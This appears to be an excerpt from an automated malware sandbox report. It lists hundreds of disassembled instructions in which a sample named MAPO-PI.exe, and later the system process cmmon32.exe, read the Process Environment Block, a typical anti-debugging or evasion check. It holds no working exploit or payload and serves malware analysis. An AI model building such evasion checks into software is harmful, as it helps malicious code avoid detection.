          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01924257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01948DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0191A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01913540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01943D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h] (listed 7 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h] (listed 3 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h] (listed 3 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h] (listed 2 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7D5E0 mov eax, dword ptr fs:[00000030h] (listed 2 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h] (listed 4 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h] (listed 4 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h] (listed 5 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9FD9B mov eax, dword ptr fs:[00000030h] (listed 2 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h] (listed 3 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D305AC mov eax, dword ptr fs:[00000030h] (listed 2 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D13D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8C577 mov eax, dword ptr fs:[00000030h] (listed 2 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h] (listed 3 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h] (listed 13 times)
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CEA537 mov eax, dword ptr fs:[00000030h]
